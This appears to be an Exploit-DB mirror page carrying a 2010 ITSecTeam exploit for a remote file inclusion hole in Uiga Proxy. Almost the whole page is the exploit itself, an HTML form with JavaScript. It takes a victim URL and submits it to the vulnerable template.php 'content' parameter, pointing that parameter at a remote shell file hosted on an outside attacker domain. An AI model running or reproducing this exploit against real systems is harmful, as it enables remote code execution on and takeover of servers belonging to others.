Uiga Proxy – Remote File Inclusion

  • 作者: ITSecTeam
    日期: 2010-04-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12049/
  • <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
    <title>coded by ahmadbady</title>
    
    <script language="JavaScript">
    
    //===========================================================================
    //( #Topic: uigaproxy
    //( #Bug type : remote file include
    //( #Advisory : 
    //===========================================================================
    //( #Author : ItSecTeam
    //( #Email: Bug@ITSecTeam.com
    //( #Website: http://www.itsecteam.com
    //( #Forum: http://forum.ITSecTeam.com
     
    //---------------------------------------------------------------------
    
    
     var path="/uigaproxy/include/"
     var file="template.php"
     var variable ="?content="
     var shell="http://ahmadbady.persiangig.com/other/a.txt?"
    
     function it(){
    xpl.action= document.xpl.victim.value+path+file+variable+shell;xpl.submit();
     }
    </script>
    
    </head>
    
    <body bgcolor="#FFFFFF">
    
    <p align="left"><font color="#0000FF"><b>uigaproxy remote file include</b></font></p>
    <form method="post" name="xpl" onSubmit="it();">
    <p align="left">
    <b><font face="Tahoma" size="2"><font color="#FF0000">example</font>:http://victim/path</a></font>
    	or
    	</font>
    	<font face="Tahoma" size="2" color="#000000">http://victim</font><font 
    size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font 
    size="2" face="Tahoma">
    	<input type="text" name="victim" size="20";"></p>
    <center>
    
    </p>
    <p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset" 
    value="reset" name="B2" style="float: left"></p>
    </form>
    <p><br>
     </p>
    </center>
    </body>
    
    </html>